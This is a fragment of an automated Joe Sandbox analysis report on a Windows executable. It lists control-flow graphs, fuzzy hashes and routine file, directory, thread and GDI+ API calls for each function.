                                                              control_flow_graph 1269 99e948-99e961 call 9b57d8 1272 99e96a-99e974 1269->1272 1273 99e963-99e965 1269->1273 1274 99e988 1272->1274 1275 99e976-99e983 GetStdHandle 1272->1275 1276 99eaa6-99eaab call 9b5787 1273->1276 1278 99e98b-99e998 1274->1278 1277 99ea6f-99ea72 1275->1277 1277->1278 1280 99e99a-99e99e 1278->1280 1281 99e9df-99e9f4 WriteFile 1278->1281 1283 99e9ff-99ea03 1280->1283 1284 99e9a0-99e9ab 1280->1284 1285 99e9f7-99e9f9 1281->1285 1288 99ea9f-99eaa2 1283->1288 1289 99ea09-99ea0d 1283->1289 1286 99e9ad 1284->1286 1287 99e9af-99e9ce WriteFile 1284->1287 1285->1283 1285->1288 1286->1287 1287->1285 1290 99e9d0-99e9db 1287->1290 1288->1276 1289->1288 1291 99ea13-99ea25 call 999230 1289->1291 1290->1284 1292 99e9dd 1290->1292 1295 99ea77-99ea9a call 9914a7 call 999653 call 991a66 1291->1295 1296 99ea27-99ea30 1291->1296 1292->1285 1295->1288 1296->1278 1297 99ea36-99ea3a 1296->1297 1297->1278 1299 99ea40-99ea6c 1297->1299 1299->1277
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099E94F
                                                              • GetStdHandle.KERNEL32(000000F5,0000002C,009A2D28,?,?,?,?,00000000,009AABB6,?,?,?,?,?,009AA80E,?), ref: 0099E978
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0099E9BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3_HandleWrite
                                                              • String ID:
                                                              • API String ID: 2898186245-0
                                                              • Opcode ID: 14560d8c378cb65485c977b619dbf0f6a5b0dbfa7e7167a056b82993e1b18f1d
                                                              • Instruction ID: 34e7e3094a94a5d2ba7e90a346df5c080c5a27c9003b7b852b6a44a64bae1f56
                                                              • Opcode Fuzzy Hash: 14560d8c378cb65485c977b619dbf0f6a5b0dbfa7e7167a056b82993e1b18f1d
                                                              • Instruction Fuzzy Hash: E241BD75A05219EFEF14DFA8D884BADBBBABF84711F044118F801AB290CB759D44CBA1

                                                              Control-flow Graph

                                                              control_flow_graph 1308 99efef-99f00a call 9b57d8 call 9a13da 1313 99f00c-99f00f 1308->1313 1314 99f031-99f033 1308->1314 1313->1314 1315 99f011-99f017 1313->1315 1316 99f035-99f03d call 99ed0d 1314->1316 1317 99f019 1315->1317 1318 99f01b-99f029 CreateDirectoryW 1315->1318 1325 99f0e3-99f0f0 GetLastError 1316->1325 1326 99f043-99f065 call 9a169a 1316->1326 1317->1318 1320 99f02f 1318->1320 1321 99f0d0-99f0d4 1318->1321 1320->1316 1323 99f0df-99f0e1 1321->1323 1324 99f0d6-99f0da call 99f58b 1321->1324 1329 99f0fb-99f100 call 9b5787 1323->1329 1324->1323 1325->1329 1330 99f0f2-99f0fa 1325->1330 1333 99f07d-99f087 1326->1333 1334 99f067-99f06e 1326->1334 1330->1329 1338 99f089-99f09e 1333->1338 1339 99f0bc-99f0ce 1333->1339 1336 99f070 1334->1336 1337 99f073-99f07b CreateDirectoryW 1334->1337 1336->1337 1337->1333 1340 99f0a0-99f0b0 call 9919a9 1338->1340 1341 99f0b3-99f0bb call 9b5726 1338->1341 1339->1321 1339->1325 1340->1341 1341->1339
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099EFF6
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,0099EBA7,?,00000001,00000000,?,?,00000024,0099A4DE,?,00000001,?,?), ref: 0099F01F
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,0099EBA7,?,00000001,00000000,?,?,00000024,0099A4DE,?), ref: 0099F075
                                                              • GetLastError.KERNEL32(?,?,00000024,0099EBA7,?,00000001,00000000,?,?,00000024,0099A4DE,?,00000001,?,?,00000000), ref: 0099F0E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                              • String ID:
                                                              • API String ID: 3709856315-0
                                                              • Opcode ID: cb6981f08dbcf0aa210a3d82fe946dc86dcd4fa529a7119f137c6563d982ef6e
                                                              • Instruction ID: 14328acffcf9bb3f96e9d81e7b8c86550a80400bf6302fbd01653972aebdf1f2
                                                              • Opcode Fuzzy Hash: cb6981f08dbcf0aa210a3d82fe946dc86dcd4fa529a7119f137c6563d982ef6e
                                                              • Instruction Fuzzy Hash: BA316D71D10209DBDF10DFADC998AEEFBBCAF88310F14442AE501E3252CB749985CB65
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E029
                                                              • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E041
                                                              • GetLastError.KERNEL32(?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E073
                                                              • GetLastError.KERNEL32(?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E092
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: a671b22433691520d2b7722975efcbd2cba35f2a5d54bab1a97a6719e2af2aaa
                                                              • Instruction ID: cc121176402fe90778d6108aceda689f7b297c74d8d70d1915aa768233c80786
                                                              • Opcode Fuzzy Hash: a671b22433691520d2b7722975efcbd2cba35f2a5d54bab1a97a6719e2af2aaa
                                                              • Instruction Fuzzy Hash: F4118E30918208EBDF30DF68C808B6E3BADFB45361F504A29E42A85190D7F5DE44AB61
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 009A764C
                                                              • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,0099736D,00995AB0,?), ref: 009A7693
                                                                • Part of subcall function 009992EB: __EH_prolog3_GS.LIBCMT ref: 009992F2
                                                                • Part of subcall function 00999500: __EH_prolog3_GS.LIBCMT ref: 00999507
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Thread$CreatePriority
                                                              • String ID: CreateThread failed
                                                              • API String ID: 3138599208-3849766595
                                                              • Opcode ID: 801460dbc799dc60e446ccd9ccfa10aec4746784ddd4bdad0240ef4a5e80d431
                                                              • Instruction ID: 8e5e7ce01b4b872677d1a5e0c509f70a18152e619b50bb5e1d568fe8142df7b0
                                                              • Opcode Fuzzy Hash: 801460dbc799dc60e446ccd9ccfa10aec4746784ddd4bdad0240ef4a5e80d431
                                                              • Instruction Fuzzy Hash: FE01DBB538C7056BE720BF9CDC82F66739CEB81715F10002DF54596180CAF16801C679
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099DEA1
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,0099E8F5,?,?,0099A6B9,?,00000011,?), ref: 0099DF15
                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,0099D303,?,?,?), ref: 0099DF65
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 1771569470-0
                                                              • Opcode ID: 9045ffffba909561ea54075f3df6d9d00b5714da32eae2700df84f937e989a44
                                                              • Instruction ID: 6537931bfe3b0694659876d5c14c92560967f924420de5b7b52fa90baf4a4bfc
                                                              • Opcode Fuzzy Hash: 9045ffffba909561ea54075f3df6d9d00b5714da32eae2700df84f937e989a44
                                                              • Instruction Fuzzy Hash: 8F416FB0D112089FDF14DFA8D8CABEEB7F8EB48320F10461EE456A7281D774A9448B24
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009A6C65
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 009A6C9A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 009A6D0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1552931673-0
                                                              • Opcode ID: bcafb5c58bc56ffec504dd847d0bf833ffe427cee89801e990d4d56d984c7f30
                                                              • Instruction ID: 0b2c25929c1236c448c40c934b83b37f6ab0af257de82750f4169dc9f38c6bbe
                                                              • Opcode Fuzzy Hash: bcafb5c58bc56ffec504dd847d0bf833ffe427cee89801e990d4d56d984c7f30
                                                              • Instruction Fuzzy Hash: DF316B71D00249DEDF04DBE8C889BEEBBB8BF89324F14011EE105B7281DB745A45CBA1
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099F592
                                                              • SetFileAttributesW.KERNELBASE(?,?,00000024,0099A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0099F5A8
                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F5EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2559025557-0
                                                              • Opcode ID: f398cdedd11e3140b38d0353d400a138dbf455d98e3a37cfacd6e369cbb2bcc4
                                                              • Instruction ID: 02e524a9ca240a3acebc86e8dd462022427a1467777120314ffa1e06916f5bf9
                                                              • Opcode Fuzzy Hash: f398cdedd11e3140b38d0353d400a138dbf455d98e3a37cfacd6e369cbb2bcc4
                                                              • Instruction Fuzzy Hash: B0111470D10209EBCF04DFA8D985AEEBBB8BF48310F14402AF800E7260DB349A55CF65
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099EC6A
                                                              • DeleteFileW.KERNELBASE(?,00000024,0099D6F7,?), ref: 0099EC7D
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 0099ECBD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 3558260747-0
                                                              • Opcode ID: 3d5152d618d8f92789e1c6ea09a6692352c1f4a188cb9d5d308dd3f3e901d8e6
                                                              • Instruction ID: 56f3a0732e093992b90f32bd334c564e347d591510b9c40352d9c9abcbb4c5c2
                                                              • Opcode Fuzzy Hash: 3d5152d618d8f92789e1c6ea09a6692352c1f4a188cb9d5d308dd3f3e901d8e6
                                                              • Instruction Fuzzy Hash: BF110775D10219DBDF04DFA8D989EDEB7B8BF48311F18442AE444F7251DB34A984CB64
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099ED26
                                                              • GetFileAttributesW.KERNELBASE(?,00000024,0099ED16,00000000,0099A4A1,1AC349C0,?,0099CDDD,?,?,?,?,?,?,?,?), ref: 0099ED39
                                                              • GetFileAttributesW.KERNELBASE(?,?,?), ref: 0099ED79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2559025557-0
                                                              • Opcode ID: 9d0ab7b16cac26ffb8718cb314092dfc396d5f883e76ed4a77644b76b15d3f50
                                                              • Instruction ID: 1975ffae508d4f2094aceb9e7581917ec4cfb217e7e081ab43b1b1962b35014a
                                                              • Opcode Fuzzy Hash: 9d0ab7b16cac26ffb8718cb314092dfc396d5f883e76ed4a77644b76b15d3f50
                                                              • Instruction Fuzzy Hash: 42111675E10218DBCF04DFA8D989AEDBBF9BF49320F18042AE504F7290DB309A448B65
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,0099E3B1,?,?,00000000,?,?,0099CC21,?), ref: 0099E55F
                                                              • GetLastError.KERNEL32 ref: 0099E56E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 8bf42a0bd6920e0f001520969bb80414a15cc730115b96d9f9802a1229128217
                                                              • Instruction ID: 10c64338de90e3fc8a1aaca091a04e5634f7b043d412726eae65ccdca6268e3a
                                                              • Opcode Fuzzy Hash: 8bf42a0bd6920e0f001520969bb80414a15cc730115b96d9f9802a1229128217
                                                              • Instruction Fuzzy Hash: 5B412871604345CBDF24EF2CD984AAEB7E9FF88720F14491DE84583261E774DC818BA2
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?), ref: 0099E78C
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0099E840
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: a9abfd23e33a3cae0281285d93f2ac05110d6a789722c030142856a8a8a4c243
                                                              • Instruction ID: fd8ceb44bb22b5be6cde5dcc0d51543b563818362ad7e48049dac3d769a02819
                                                              • Opcode Fuzzy Hash: a9abfd23e33a3cae0281285d93f2ac05110d6a789722c030142856a8a8a4c243
                                                              • Instruction Fuzzy Hash: 5A21E135259281EBCB14DEA8C891AABBFECAF95304F08491DF4C583141D329E90DD762
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009AFB52
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,009E535C), ref: 009AFC24
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3_Operation_wcslen
                                                              • String ID:
                                                              • API String ID: 3104323202-0
                                                              • Opcode ID: 0657e3a612447227ccaa45efb873c5c39cc2db925e0df3fec65bada6f6cd9e21
                                                              • Instruction ID: 82124a41a806759e0725a13ad3a76ce23e87e2e88ea8d4bce8019991b4ee28af
                                                              • Instruction Fuzzy Hash: C5312371D00248DEDF15EFE9C996BDCBBB4BF49364F54012EE019AB192DB700A45CB60
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0099E897
                                                              • GetLastError.KERNEL32 ref: 0099E8A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 60af5dbfdaadb341f6cd86256b36b4ce7108296a33a430e89f99cde2f04a6576
                                                              • Instruction ID: 4f96e0c8528d1abca80639ae687ec2af46cbadb008cf0a2dc23b93baa68e3c4c
                                                              • Instruction Fuzzy Hash: 6911E130A00710ABEF34D6AEC840BA6B7EDAB45361F644B29E062929D0D7B0FD45D764
                                                              APIs
                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 009B3C82
                                                              • _wcslen.LIBCMT ref: 009B3C99
                                                                • Part of subcall function 009A6A89: _wcslen.LIBCMT ref: 009A6AA6
                                                                • Part of subcall function 0099B03D: __EH_prolog3_GS.LIBCMT ref: 0099B044
                                                                • Part of subcall function 0099B3E1: __EH_prolog3_GS.LIBCMT ref: 0099B3E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                              • String ID:
                                                              • API String ID: 1265872803-0
                                                              • Opcode ID: 3a1af482b0650668cac160a918fdb39b2512b81e3d148576021664ff3130d40f
                                                              • Instruction ID: 6985d4b6dd112ea3a47bb582a78dab0fc92ae26e5ea441d9957d286dc50834ae
                                                              • Instruction Fuzzy Hash: 96110C319196D0AECB11EB68AD91BDC7BF4AB55318F06419EE4449F253CB704E40D7A2
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00991CE9
                                                              • GetDlgItem.USER32(?,?), ref: 00991D01
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Item_wcslen
                                                              • String ID:
                                                              • API String ID: 896027972-0
                                                              • Opcode ID: 5715adad90ca5a251890b89885cd9154dbc415c8f5346985de638cc36ee67cab
                                                              • Instruction ID: 6b239b013b14aee55594093d43e940082717f2c3cd0cb2b13fa8bc9354e73002
                                                              • Instruction Fuzzy Hash: FC017171A012059EDB24AFACC986BEDB7ECBF98350F40050AF816A71D1CB709A41C711
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,009A76EA,009A0B6F), ref: 009A76B4
                                                              • GetProcessAffinityMask.KERNEL32(00000000,?,009A76EA), ref: 009A76BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: d897c9c180c4ef4456c4b2af5b7f0502b43fb6843e0b259730a06095c067b0e9
                                                              • Instruction ID: 0ade487c6b8fb0caf978953d40c67ff609bc6e0b94ab56ca61815bd5152e45b0
                                                              • Instruction Fuzzy Hash: 02E0D873F24906A7CF19C7ED9C06AEBB6DDEA452483184079E413D3100F974DD0156E1
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,009C9B73,000000FF), ref: 009AF578
                                                              • CoUninitialize.COMBASE(?,?,?,?,009C9B73,000000FF), ref: 009AF57D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: 616383d7d999441b71b0a12c92b8ae11b51dd34d94cc5db5a07d09e851dd6c60
                                                              • Instruction ID: 9573be20c2ecd3c9615ce2e2cdd50a7cc14eede0315533f333578b696bd92c27
                                                              • Instruction Fuzzy Hash: FCF03A76A18A44AFC7019F59EC45B9ABBA8FB88760F00422AE51693760CB74A800CA90
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009AE86A
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 009AE871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: bf70a8ebd577afa495264ebf5d031ef947c871c8378c10d3ec39ac1d1d3e467c
                                                              • Instruction ID: c21a801fd6bc30a3e7ebc0c66e7138db6977e4434e8821d2b06eb97addb486ed
                                                              • Instruction Fuzzy Hash: EAE01271901218EFCB60DF59C905BDDB7F8FB45360F20845AA88593641E674AE04DB91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: 90c53506244927580f5b7e6e80e75694a74d3b63edb35e741a5119b787e52c62
                                                              • Instruction ID: 5f6d531449029c48eb481969a295d7729347202c576ea6d314cbee9478b8eb22
                                                              • Instruction Fuzzy Hash: 34C0123206C280BECB010BB0DC09D2ABBA8ABA6212F00CA08F0A5C0060C239C810EB12
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00991CD2
                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00991CD9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
